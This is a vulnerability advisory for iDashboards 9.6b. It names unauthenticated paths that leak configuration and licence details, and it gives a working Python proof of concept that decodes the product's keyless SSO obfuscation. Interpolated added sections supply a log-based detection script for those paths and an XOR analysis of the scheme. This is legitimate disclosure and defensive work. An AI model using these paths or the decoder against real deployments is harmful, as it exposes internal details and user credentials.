iDashboards 9.6b, Multiple Vulnerabilities

# Authors: Andrea Ferraris, Raffaele Forte
# Vendor Homepage: https://www.idashboards.com/
# Version: 9.6b and earlier

I. INTRODUCTION
iDashboards is a closed-source system for visualizing data in the form of graphs.

II. DESCRIPTION
The web application suffers from multiple vulnerabilities.

1. Sensitive Data Exposure

By requesting specific paths, an unauthenticated user can obtain various information about the system.

a. Configuration Disclosure (CVE-2018-7209)

Requesting the URL “https://<url>/idashboards/config.xml” returns information such as the version, internal URLs, etc.:

[...]
<serverURL>/idashboards/idb?CMD=$C$</serverURL>
<dashReportURL>/idashboards/idb/reports/prep/d/$DASH_ID$/$FORMAT$/$INLINE$/</dashReportURL>
<chartReportURL>/idashboards/idb/reports/prep/c/$CHART_ID$-$DASH_ID$/$FORMAT$/$INLINE$/</chartReportURL>
<serverRoot>/idashboards/</serverRoot>
[...]
<version>9.6b</version>
<productID>9.6b-181217101653-160.45</productID>
<companyName>XXX snc | XXX </companyName>
[...]
<adminUrl>http://XXXXXXX:6700/idashboards/admin/</adminUrl>
[...]

b. License information disclosure (CVE-2018-7210)

To install the license, the administrator visits “https://<url>/idb/config?CMD=installLicense”.

Once a license has been applied, this page remains reachable by unauthenticated users, so an attacker can obtain information about the system (type of license, internal IP address, etc.) and about guest accounts (if present):

Licensed to: XXX snc
License expires: Never
Licensed CPUs: Unlimited
Number of named users: 51
Number of concurrent users: 51
Guest users: guest
Licensed IP Addresses: 10.1.1.7
Licensed Domain(s): 
Server Name: XXXDASHBOARDS
Server IP Address: 10.1.1.7
Server CPUs: 8
License type: XXX-XX-XXXX
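
A defender-side check for the two disclosures above, added here as an example and not part of the advisory: it scans web-server access-log lines for successful requests to the config.xml and license pages from clients outside an administrator allowlist. The log lines, the 192.0.2.x client addresses and the admin_sources allowlist are constructed assumptions; the two paths are the ones named in the advisory, and accepting the license path with or without the /idashboards context prefix is an assumption about deployment layout.

```python
import re
from collections import Counter

# Constructed sample lines in Apache "combined" format (not real traffic);
# client addresses come from the RFC 5737 documentation range.
SAMPLE_LOG = """\
192.0.2.50 - - [10/Mar/2018:10:02:11 +0100] "GET /idashboards/config.xml HTTP/1.1" 200 2314 "-" "curl/7.58.0"
192.0.2.50 - - [10/Mar/2018:10:02:12 +0100] "GET /idb/config?CMD=installLicense HTTP/1.1" 200 1187 "-" "curl/7.58.0"
192.0.2.20 - - [10/Mar/2018:10:03:01 +0100] "GET /idashboards/idb?CMD=login HTTP/1.1" 200 5021 "-" "Mozilla/5.0"
192.0.2.50 - - [10/Mar/2018:10:05:40 +0100] "GET /idashboards/config.xml HTTP/1.1" 404 312 "-" "curl/7.58.0"
"""

# Paths named in the advisory; the license page is accepted with or without
# the /idashboards context prefix because deployments differ (assumption).
SENSITIVE_PATHS = {
    "CVE-2018-7209 config.xml disclosure":
        re.compile(r"^/idashboards/config\.xml(?:\?|$)"),
    "CVE-2018-7210 license page disclosure":
        re.compile(r"^(?:/idashboards)?/idb/config\?(?:.*&)?CMD=installLicense(?:&|$)"),
}

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return the fields we need from one access-log line, or None if unparsable."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"), "path": m.group("path"), "status": int(m.group("status"))}

def find_exposures(log_text, admin_sources=frozenset()):
    """List (client_ip, label, path) for every 200 response on a sensitive path
    served to a client outside admin_sources (constructed allowlist of admin hosts)."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] != 200 or rec["ip"] in admin_sources:
            continue
        for label, pattern in SENSITIVE_PATHS.items():
            if pattern.search(rec["path"]):
                findings.append((rec["ip"], label, rec["path"]))
    return findings

def clients_by_hits(findings):
    """Count findings per client address, most active first."""
    return Counter(ip for ip, _, _ in findings).most_common()

if __name__ == "__main__":
    for ip, label, path in find_exposures(SAMPLE_LOG):
        print(f"{ip} fetched {path} ({label})")
```

Only 200 responses are reported, so the same check run after the pages have been restricted (for example by a reverse-proxy rule that requires an authenticated session or an administrator source address) should return nothing; a 403 or 404 on these paths is the expected result.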

2. Reverse engineering of SSO obfuscation (CVE-2018-7211)

As the Admin Manual states, the SSO obfuscation is weak:

The iDashboards obfuscation library uses a proprietary, weak two-way encryption algorithm to obfuscate text. It is possible that a resourceful attacker could reverse-engineer the algorithm and use it to obfuscate SSO login URLs, or decode obfuscated ones. Moreover, anyone with access to the idb_encrypt.jar file or idb_encrypt.dll, and the proper knowledge, could use it to obfuscate SSO login URLs.

The algorithm can indeed be reverse-engineered, as the PoC below shows:

[PoC_iDashboard.py]

import sys

def encrypt(string):
    # One bit of each character is flipped: the bit position cycles 0..7
    # and restarts every eight characters. No key is involved anywhere.
    i = 0
    out = ""
    for c in string:
        power = pow(2, i)
        if power == 256:
            i = 0
            power = pow(2, i)
        i += 1
        val = ord(c)
        k = val // power
        if k % 2 == 0:
            # bit is clear: set it
            val += power
        else:
            # bit is set: clear it
            val -= power
        # always emit two hex digits so decrypt() can split the output in pairs
        out += format(val, '02x')
        #print("Power:" + str(power) + " - Before:" + hex(ord(c)) + " - After:" + hex(val))
    return out

def decrypt(string):
    i = 0
    k = 0
    array = []
    l = len(string) - 1
    # split the hex string into byte values
    while k < l:
        array.append(int(string[k:k+2], 16))
        k += 2
    out = ""
    for c in array:
        # same bit flip as encrypt(): the transform is its own inverse
        power = pow(2, i)
        if power == 256:
            i = 0
            power = pow(2, i)
        i += 1
        val = c
        k = val // power
        if k % 2 == 0:
            val += power
        else:
            val -= power
        out += chr(val)
        #print("Power:" + str(power) + " - Before:" + hex(c) + " - After:" + hex(val) + " - Char:" + chr(val))
    return out

def main(args):
    if len(args) < 3 or args[1] not in ('d', 'e'):
        print("Usage: " + args[0] + " <e|d> <string>")
        return
    if args[1] == 'd':
        o = decrypt(args[2])
    else:
        o = encrypt(args[2])
    print(o)

if __name__ == '__main__':
    main(sys.argv)
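
The PoC's add/subtract step is easier to reason about once it is recognised as a plain bit flip. The following is an added example, not code from the advisory or from iDashboards: it rewrites the scheme as XOR with a position-dependent single-bit mask, verifies exhaustively that this equals the PoC's add/subtract rule for every byte and bit position, and shows that the transform is its own inverse, which is why decoding needs no key. The sample string is constructed; ASCII input is assumed, as in the PoC.

```python
def position_mask(i):
    """Bit flipped at character position i: cycles 1,2,4,...,128 and restarts
    every eight characters, matching the power-of-two schedule in the PoC."""
    return 1 << (i % 8)

def obfuscate(text):
    """Hex output of the PoC's encrypt(): exactly one bit of each byte is flipped.
    Assumes ASCII input (code points below 256)."""
    return "".join(format(ord(c) ^ position_mask(i), "02x") for i, c in enumerate(text))

def deobfuscate(hex_text):
    """Inverse of obfuscate(); the same flip undoes itself, so no key is needed."""
    return "".join(chr(b ^ position_mask(i)) for i, b in enumerate(bytes.fromhex(hex_text)))

def add_subtract_rule(val, power):
    """The PoC's rule: add the power if that bit is clear, subtract it if set."""
    return val + power if (val // power) % 2 == 0 else val - power

def rule_is_plain_xor():
    """Exhaustively confirm that the add/subtract rule equals XOR for every byte
    value and every bit position, i.e. the scheme carries no secret at all."""
    return all(add_subtract_rule(v, 1 << b) == v ^ (1 << b)
               for v in range(256) for b in range(8))

def round_trips(text):
    """True when applying the flip twice restores the input (involution)."""
    return deobfuscate(obfuscate(text)) == text

if __name__ == "__main__":
    sample = "user=demo&pass=example"   # constructed SSO-style parameter string
    print(obfuscate(sample))
    print("rule is XOR:", rule_is_plain_xor())
    print("round trip ok:", round_trips(sample))
```

Because the mask depends only on the character position, every deployment uses the same transform, so a login URL obfuscated this way is effectively plaintext to anyone who can observe it; treating the SSO URL as a secret, or transporting it over anything other than an authenticated TLS channel, is therefore not a safe design.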

IV. BUSINESS IMPACT
These flaws may compromise the integrity of the system and/or expose sensitive information.
Moreover, reverse engineering the SSO obfuscation allows an attacker in a MitM position to obtain usernames and passwords.

V. SYSTEMS AFFECTED
iDashboards v9.6b is vulnerable (and probably all previous versions).

VI. VULNERABILITY HISTORY
January 30th, 2018: Vulnerability identification
February 16th, 2018: Vendor notification
February 18th, 2018: CVE-ID reserved

VII. LEGAL NOTICES
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.